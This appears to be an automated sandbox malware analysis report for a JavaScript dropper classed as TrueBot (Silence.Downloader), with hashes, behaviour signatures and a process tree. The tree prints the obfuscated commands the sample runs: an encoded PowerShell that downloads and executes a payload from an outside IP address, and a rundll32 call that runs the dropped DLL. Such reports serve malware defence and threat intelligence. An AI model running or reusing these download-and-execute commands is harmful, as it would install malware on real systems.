Overview
overview
10Static
static
1000000000/...bf.ps1
windows7-x64
10000000000/...bf.ps1
windows10-2004-x64
101/287b172c...fbd.js
windows7-x64
101/287b172c...fbd.js
windows10-2004-x64
101/3c57867d...008.js
windows7-x64
101/3c57867d...008.js
windows10-2004-x64
101/922b1d76...023.js
windows7-x64
101/922b1d76...023.js
windows10-2004-x64
101/b1978101...66.exe
windows7-x64
11/b1978101...66.exe
windows10-2004-x64
1Analysis
-
max time kernel
127s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
09-04-2023 14:50
Static task
static1
Behavioral task
behavioral1
Sample
000000000/d0c95cfef2e6c85abb28ee971216b3bf.ps1
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
000000000/d0c95cfef2e6c85abb28ee971216b3bf.ps1
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
1/287b172c23da5426cf039ef55d959fbd.js
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
1/287b172c23da5426cf039ef55d959fbd.js
Resource
win10v2004-20230221-en
Behavioral task
behavioral5
Sample
1/3c57867dc4bdeb8a7d55dfb7d8ef5008.js
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
1/3c57867dc4bdeb8a7d55dfb7d8ef5008.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral7
Sample
1/922b1d765a3f88f8b0fb8ee3f71f3023.js
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
1/922b1d765a3f88f8b0fb8ee3f71f3023.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
1/b19781010225032c77834156cb1eb466.exe
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
1/b19781010225032c77834156cb1eb466.exe
Resource
win10v2004-20230220-en
General
-
Target
1/922b1d765a3f88f8b0fb8ee3f71f3023.js
-
Size
67KB
-
MD5
922b1d765a3f88f8b0fb8ee3f71f3023
-
SHA1
4503ab32fe2e77360ea4c4b1882dffe448c68127
-
SHA256
37906b8349562bfb21048b0c20e26a26c721a649bb64803377de778d81c4036f
-
SHA512
6c4226a7ffa53a6c90a68b3ec65d2514965e14909e9c8db15865cb23955df699688980e8c4ce8b6ee30ca0327e9e2eec41b63e8e07ad41fa38a38d6eb7c11984
-
SSDEEP
1536:EMtPc6S1wxBOGKZUXldvp3yZEKs7+QhqWIoCqlO1wKF7x1tNRhn4xVNe/6BPfGMd:i1wxBOGKZUXldvp3yZEKs7+QhqWIoCqJ
Malware Config
Extracted
http://62.204.41.69/dll.png
Signatures
-
TrueBot payload 5 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\NoSleep.dll family_truebot \Users\Admin\AppData\Roaming\NoSleep.dll family_truebot \Users\Admin\AppData\Roaming\NoSleep.dll family_truebot \Users\Admin\AppData\Roaming\NoSleep.dll family_truebot \Users\Admin\AppData\Roaming\NoSleep.dll family_truebot -
TrueBot, Silence.Downloader
A downloader attributed to Silence group first seen in 2017.
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exerundll32.exeflow pid process 3 768 powershell.exe 5 1312 rundll32.exe 8 1312 rundll32.exe 9 1312 rundll32.exe -
Loads dropped DLL 4 IoCs
Processes:
rundll32.exepid process 1312 rundll32.exe 1312 rundll32.exe 1312 rundll32.exe 1312 rundll32.exe -
Drops file in Windows directory 1 IoCs
Processes:
rundll32.exedescription ioc process File created C:\Windows\Tasks\MicrosoftEdgeUpdateTaskMachineCore{1575CC8A-457A-1700-652A-6AF2B031A266}.job rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exerundll32.exepid process 768 powershell.exe 1312 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exerundll32.exedescription pid process Token: SeDebugPrivilege 768 powershell.exe Token: SeDebugPrivilege 1312 rundll32.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
wscript.execmd.exepowershell.execmd.exedescription pid process target process PID 1416 wrote to memory of 900 1416 wscript.exe cmd.exe PID 1416 wrote to memory of 900 1416 wscript.exe cmd.exe PID 1416 wrote to memory of 900 1416 wscript.exe cmd.exe PID 900 wrote to memory of 768 900 cmd.exe powershell.exe PID 900 wrote to memory of 768 900 cmd.exe powershell.exe PID 900 wrote to memory of 768 900 cmd.exe powershell.exe PID 768 wrote to memory of 1920 768 powershell.exe cmd.exe PID 768 wrote to memory of 1920 768 powershell.exe cmd.exe PID 768 wrote to memory of 1920 768 powershell.exe cmd.exe PID 1920 wrote to memory of 1312 1920 cmd.exe rundll32.exe PID 1920 wrote to memory of 1312 1920 cmd.exe rundll32.exe PID 1920 wrote to memory of 1312 1920 cmd.exe rundll32.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1\922b1d765a3f88f8b0fb8ee3f71f3023.js1⤵
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4ANgA5AC8AZABsAGwALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA2⤵
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4ANgA5AC8AZABsAGwALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c rundll32 %APPDATA%\NoSleep.dll ChkdskExs4⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\system32\rundll32.exerundll32 C:\Users\Admin\AppData\Roaming\NoSleep.dll ChkdskExs5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.1MB
MD5f52363b6cf282669e5fcc5537b5c3451
SHA19d9a0b90042fce790ab23191be9cce44c86f13d9
SHA256b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34
SHA512d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49
-
Filesize
1.1MB
MD5f52363b6cf282669e5fcc5537b5c3451
SHA19d9a0b90042fce790ab23191be9cce44c86f13d9
SHA256b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34
SHA512d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49
-
Filesize
1.1MB
MD5f52363b6cf282669e5fcc5537b5c3451
SHA19d9a0b90042fce790ab23191be9cce44c86f13d9
SHA256b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34
SHA512d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49
-
Filesize
1.1MB
MD5f52363b6cf282669e5fcc5537b5c3451
SHA19d9a0b90042fce790ab23191be9cce44c86f13d9
SHA256b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34
SHA512d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49
-
Filesize
1.1MB
MD5f52363b6cf282669e5fcc5537b5c3451
SHA19d9a0b90042fce790ab23191be9cce44c86f13d9
SHA256b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34
SHA512d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49